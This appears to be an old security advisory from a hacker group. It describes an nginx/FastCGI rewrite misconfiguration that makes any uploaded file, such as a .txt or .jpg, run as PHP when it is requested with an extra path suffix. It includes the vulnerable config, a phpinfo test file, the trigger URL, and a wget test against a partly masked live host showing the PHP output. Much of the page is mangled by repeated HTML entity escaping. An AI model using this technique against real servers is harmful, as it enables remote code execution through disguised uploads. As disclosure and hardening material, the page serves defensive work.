another wrong configuration (non default) found by : Ev1lut10n
===========================
Special thanks to: Flyff666, Danzel, X-hack, Whitehat, P4, wenkhairu, badwolves , superman, cakill, ketek and all Chinese and Indonesians and all my
bro
===========================
yep this another configuration that trigger a hole that i've found a bit different from the one from 80sec (http://www.80sec.com/nginx-securit.html) .
For a fastcgi setting on nginx.conf like this (just example):
============
fastcgi_param SCRIPT_FILENAME /home/any_user/public_html$fastcgi_script_name;
if (!-e $request_filename) {
rewrite ^(.+)$ /index.php?q=$1 last;
}
===========
where /home/any_user/public_html can be any path , the above setting is a non default nginx configuration.
any file extension that requested like : file.extension/any_string will be treated just like a php script ,
ex: test.txt/any_string_without_php_extension
as example here we've a file text on /home/user/www
==========================
root@host [/home/any_user_and_path/www]# cat tes.txt
<?php phpinfo();?>
====================
where any request of that test.txt like this:
==============================
http://domain.com/tes.txt/any_string_without_php_extension
=============================
will be treated as php script.
ok, based on http://www.80sec.com/nginx-securit.html -> it suggest a patch on nginx.conf or can be on php.ini
on nginx.conf by adding:
if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}
or on php.ini by cgi.fix_pathinfo=0
unfortunetly this will not fix your hole when u've the wrong config above. as i've check it still treated as php script:
===========
root@host [/usr/local/nginx/conf]# cat /usr/local/lib/php.ini | grep cgi.fix_pathinfo
; cgi.fix_pathinfo provides *real* PATH_INFO/PATH_TRANSLATED support for CGI. PHP's
cgi.fix_pathinfo=0
root@host [/usr/local/nginx/conf]# /etc/init.d/httpd restart
Restarting nginx daemon: nginxRemaining processes: 12091
root@host [/usr/local/nginx/conf]# wget http://***********.net/tes.jpg/any_string_without_extension
--08:35:00-- http://***********.net/tes.jpg/any_string_without_extension
=&amp;amp;amp;gt; `any_string_without_extension'
Resolving ***********.net... 204.197.248.127
Connecting to ***********.net|204.197.248.127|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ &amp;amp;amp;lt;=&amp;amp;amp;gt;
] 46,064 --.--K/s
08:35:03 (9.38 MB/s) - `any_string_without_extension' saved [46064]
root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'PHP Version'
&amp;amp;amp;lt;a href="http://www.php.net/"&amp;amp;amp;gt;&amp;amp;amp;lt;img border="0"
src="/tes.jpg?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo"
/&amp;amp;amp;gt;&amp;amp;amp;lt;/a&amp;amp;amp;gt;&amp;amp;amp;lt;h1 class="p"&amp;amp;amp;gt;PHP Version
5.2.17&amp;amp;amp;lt;/h1&amp;amp;amp;gt;root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'safe_mode'
&amp;amp;amp;lt;tr&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="e"&amp;amp;amp;gt;safe_mode&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;On&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;On&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;/tr&amp;amp;amp;gt;
&amp;amp;amp;lt;tr&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="e"&amp;amp;amp;gt;safe_mode_exec_dir&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;&amp;amp;amp;lt;i&amp;amp;amp;gt;no
value&amp;amp;amp;lt;/i&amp;amp;amp;gt;&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;&amp;amp;amp;lt;i&amp;amp;amp;gt;no
value&amp;amp;amp;lt;/i&amp;amp;amp;gt;&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;/tr&amp;amp;amp;gt;
&amp;amp;amp;lt;tr&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="e"&amp;amp;amp;gt;safe_mode_gid&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;On&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;On&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;/tr&amp;amp;amp;gt;
&amp;amp;amp;lt;tr&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="e"&amp;amp;amp;gt;safe_mode_include_dir&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;&amp;amp;amp;lt;i&amp;amp;amp;gt;no
value&amp;amp;amp;lt;/i&amp;amp;amp;gt;&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;&amp;amp;amp;lt;i&amp;amp;amp;gt;no
value&amp;amp;amp;lt;/i&amp;amp;amp;gt;&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;/tr&amp;amp;amp;gt;
&amp;amp;amp;lt;tr&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="e"&amp;amp;amp;gt;sql.safe_mode&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;Off&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;Off&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;/tr&amp;amp;amp;gt;
&amp;amp;amp;lt;tr&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="e"&amp;amp;amp;gt;safe_mode_allowed_env_vars&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;PHP_&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;PHP_&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;/tr&amp;amp;amp;gt;
&amp;amp;amp;lt;tr&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="e"&amp;amp;amp;gt;safe_mode_protected_env_vars&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;LD_LIBRARY_PATH&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;td
class="v"&amp;amp;amp;gt;LD_LIBRARY_PATH&amp;amp;amp;lt;/td&amp;amp;amp;gt;&amp;amp;amp;lt;/tr&amp;amp;amp;gt;
root@host [/usr/local/nginx/conf]# &amp;amp;amp;lt;br /&amp;amp;amp;gt;
=================================================&amp;amp;amp;lt;br /&amp;amp;amp;gt;
&amp;amp;amp;lt;br /&amp;amp;amp;gt;
(trust me that u must be very careful when u're gonna setting nginx and fastcgi !! a little mistake on config will trigger a hole on ur
server)